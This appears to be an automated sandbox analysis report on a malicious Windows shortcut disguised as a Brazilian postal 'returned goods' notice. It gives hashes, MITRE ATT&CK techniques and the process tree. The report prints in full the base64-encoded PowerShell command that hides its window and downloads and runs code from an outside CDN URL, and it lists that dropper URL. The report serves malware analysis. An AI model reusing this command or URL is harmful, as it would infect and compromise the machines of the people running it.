f37082455c2af0cba715743d283281af61d94ff1ca6d1f1446dd02623e1b2aa0

General

Target

Mercadoria_Devolvida-Correios-8E7ABAG7.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	4328	powershell.exe
9	4328	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4328	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 4328	3196	cmd.exe	83
PID 3196 wrote to memory of 4328	3196	cmd.exe	83
PID 4328 wrote to memory of 2324	4328	powershell.exe	84
PID 4328 wrote to memory of 2324	4328	powershell.exe	84
PID 2324 wrote to memory of 3152	2324	csc.exe	85
PID 2324 wrote to memory of 3152	2324	csc.exe	85

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-8E7ABAG7.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3196
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4328
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wcgdwnu2\wcgdwnu2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2324
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7280.tmp" "c:\Users\Admin\AppData\Local\Temp\wcgdwnu2\CSC9E29580A7F54775805C72A552462CBB.TMP"
      4⤵
      PID:3152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7280.tmp

Filesize
1KB

MD5
4e4a11830837d20e91f85923c6a7395b

SHA1
1ed0ff049087e226089d3ea31a741dc18b96b017

SHA256
f5499eba1194abc6deed94671878267a4f82f5af6484da2cb63ef50e88d53398

SHA512
a8c93fdb51edbd69a1796bdfba2eb1fb63fbeff057848f0567306f9b6094f8aa8575122ca7a2e5c3f5e69cd75d69882d76b93f7ebb4241326292e67eb15416a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oda2lgyo.z34.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wcgdwnu2\wcgdwnu2.dll

Filesize
3KB

MD5
3dd2dd60f4fcacbac5e1fbcfa4ac3bcb

SHA1
bca99d24745060ae45fe3eede7c29816e368c659

SHA256
c4ad0542c19bec70cd83b7d07ce202a172cebc84e0629b278bc228576b6fbbfc

SHA512
58a65778dcd00d1367628e0e65b2a3c6b5bb5f0cfaca246fd39fb3f4ae2c5f82bc8bc463338664304f1acabf020ae13f2a1fc66a503c6d9451b96d0a3c8172dc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wcgdwnu2\CSC9E29580A7F54775805C72A552462CBB.TMP

Filesize
652B

MD5
2acce162291706847c92fd97da54324c

SHA1
b5c0695a4c3a812dd8d3ba55ff7af2b51547bccc

SHA256
81c41d93c7fdb6885c4cab27ee03d8f232801c88d04b02daf7fc479d83faf118

SHA512
8c72dfb9527a6c0abde306cfea64e608c0cb24d80a6ba235acbb7b1a2b902a42e52fac38221ee40fd49468c70efb0b7081fc422a9e21fe853ad3fe9d76a6cc5a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wcgdwnu2\wcgdwnu2.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wcgdwnu2\wcgdwnu2.cmdline

Filesize
369B

MD5
8893df244e974caa46ffeea52cec93b6

SHA1
d9daf10ed664b6cb0f23a529c685175f84bbcd4e

SHA256
f33733c6757363a5700afff22cc295cd0dadd5cb8c98805baf8ea9b49d6401cb

SHA512
84c5efaed9af1f1566367e43270b2b0b06bf1918c7c8b72a36c07bdd42e50ccd4a311ec4cf33d3076e860a1b3f6991440d96170727bbe8b5b71b1b4a14bcc730

Download Submit
memory/4328-2-0x00007FFF8D2A3000-0x00007FFF8D2A5000-memory.dmp

Filesize
8KB

Download
memory/4328-3-0x0000021B6B6E0000-0x0000021B6B702000-memory.dmp

Filesize
136KB

Download
memory/4328-13-0x00007FFF8D2A0000-0x00007FFF8DD61000-memory.dmp

Filesize
10.8MB

Download
memory/4328-14-0x00007FFF8D2A0000-0x00007FFF8DD61000-memory.dmp

Filesize
10.8MB

Download
memory/4328-27-0x0000021B6B6D0000-0x0000021B6B6D8000-memory.dmp

Filesize
32KB

Download
memory/4328-31-0x00007FFF8D2A0000-0x00007FFF8DD61000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing